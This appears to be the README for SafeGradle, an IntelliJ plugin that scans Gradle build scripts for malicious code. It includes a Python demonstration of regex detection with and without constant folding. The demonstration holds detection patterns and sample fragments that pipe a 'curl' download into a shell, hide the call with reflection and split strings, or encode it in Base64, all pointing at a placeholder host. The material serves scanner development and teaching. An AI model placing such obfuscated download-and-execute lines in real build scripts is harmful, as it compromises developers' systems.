SafeGradle is a professional-grade security scanner for IntelliJ IDEA that protects your development environment from malicious Gradle build scripts. It identifies security risks like hidden network calls, shell execution, and credential leaks before they can compromise your system.
- Semantic PSI Analysis: High-precision scanning using IntelliJ's Program Structure Interface (PSI) to detect obfuscated or dynamically constructed malicious code in both Kotlin (.kts) and Groovy scripts.
- Pre-opening Security: Integrated "Open in SafeGradle" actions on the Welcome Screen and "Trust Project" dialogs allow you to audit open-source projects before fully loading them.
- Software Composition Analysis (SCA): Automatically detects dependencies with known vulnerabilities (CVEs) to prevent supply chain attacks.
- Team-Wide Configuration: Share security policies across your team using a `.safegradle.yml` file in your project root.
- Real-time Protection: Editor annotations, gutter icons, and Alt+Enter quick-fixes provide immediate feedback as you edit build scripts.
- Incremental Scanning: Intelligent caching ensures scans are lightning-fast, only re-checking files when they change.
Keep your IDE secure and code with confidence.
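The point of semantic analysis over plain text matching is easiest to see on a script that builds its dangerous strings at runtime. The following Python script is an added example, not SafeGradle's code and not a description of how its PSI analysis works: it runs a small set of hypothetical regex indicators (shell execution, network call, hard-coded credential) over constructed Gradle Kotlin DSL fragments, first on the raw text and then after a constant-folding pass that collapses `"a" + "b"` concatenations and inline Base64 decodes. The sample scripts, the host `example.invalid`, and the pattern set are all assumptions made for the demonstration.

```python
"""Toy build-script scanner: textual matching vs. matching after constant folding.

Constructed example to illustrate why dynamically built strings defeat
plain text matching. Not SafeGradle's implementation.
"""
import base64
import re

# Hypothetical indicators a reviewer would flag in a build script. Illustrative only.
PATTERNS = {
    "shell_execution": re.compile(
        r'Runtime\.getRuntime\(\)\.exec\(|ProcessBuilder\(|getMethod\("exec"|"java\.lang\.Runtime"'
    ),
    # Requires at least one character after the scheme so a bare "http://" literal
    # that is only completed by concatenation does not match on its own.
    "network_call": re.compile(r'https?://[^"\s]+'),
    "credential_leak": re.compile(r'(?i)(password|secret|token|apikey)\s*=\s*"[^"]+"'),
}

# Two constant-construction idioms the folding pass understands:
# adjacent literal concatenation and an inline Base64 decode of a literal.
STRING_CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')
BASE64_DECODE = re.compile(r'String\(Base64\.getDecoder\(\)\.decode\("([A-Za-z0-9+/=]+)"\)\)')


def scan_text(script: str) -> list[tuple[int, str, str]]:
    """Line-by-line regex scan. Returns (1-based line number, category, evidence)."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), 1):
        for category, pattern in PATTERNS.items():
            match = pattern.search(line)
            if match:
                findings.append((lineno, category, match.group(0)))
    return findings


def fold_constants(script: str) -> str:
    """Rewrite compile-time constant expressions to the literal they produce.

    Iterates to a fixed point so chains like "a" + "b" + "c" collapse fully
    and a Base64 literal is replaced by its decoded text.
    """
    previous = None
    while previous != script:
        previous = script
        script = STRING_CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', script)
        script = BASE64_DECODE.sub(
            lambda m: '"' + base64.b64decode(m.group(1)).decode() + '"', script
        )
    return script


def scan_folded(script: str) -> list[tuple[int, str, str]]:
    """The same textual scan, run over the constant-folded script."""
    return scan_text(fold_constants(script))


# --- Constructed sample scripts (not taken from any real project) ---
PLAIN = (
    'val nexusPassword = "hunter2-constructed"\n'
    'val p = Runtime.getRuntime().exec("curl http://example.invalid/p.sh | sh")\n'
)

# Reflection with split literals: no indicator is visible as contiguous text.
SPLIT_LITERALS = (
    'val rt = Class.forName("java.lang." + "Run" + "time")\n'
    'val m = rt.getMethod("ex" + "ec", String::class.java)\n'
    'm.invoke(rt.getMethod("getRuntime").invoke(null), "curl " + "http://" + "example.invalid/p.sh")\n'
)

# The API call is visible, but the payload (and its URL) is hidden in Base64.
ENCODED_CMD = base64.b64encode(b"curl http://example.invalid/p.sh | sh").decode()
BASE64_PAYLOAD = (
    'ProcessBuilder("sh", "-c", String(Base64.getDecoder().decode("'
    + ENCODED_CMD + '"))).start()\n'
)

if __name__ == "__main__":
    for name, script in [("plain", PLAIN), ("split_literals", SPLIT_LITERALS),
                         ("base64_payload", BASE64_PAYLOAD)]:
        print(f"{name}: textual = {scan_text(script)}")
        print(f"{name}: folded  = {scan_folded(script)}")
```

Running it shows the textual pass finding nothing at all in the reflection sample and missing the URL in the Base64 sample, while the folded pass reports the `java.lang.Runtime` lookup, the `exec` method and the download host. Constant folding of two idioms is only a sketch of what a PSI-based analysis sees; a real scanner also has to follow variables, string templates and method calls, which is exactly the gap the plugin's semantic analysis is meant to close.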
- Using the IDE built-in plugin system:
  Settings/Preferences > Plugins > Marketplace > Search for "SafeGradle" > Install
- Using JetBrains Marketplace:
  Go to JetBrains Marketplace and install it by clicking the Install to ... button if your IDE is running.
  You can also download the latest release from JetBrains Marketplace and install it manually using Settings/Preferences > Plugins > ⚙️ > Install plugin from disk...
- Manually:
  Download the latest release and install it manually using Settings/Preferences > Plugins > ⚙️ > Install plugin from disk...
Plugin based on the IntelliJ Platform Plugin Template.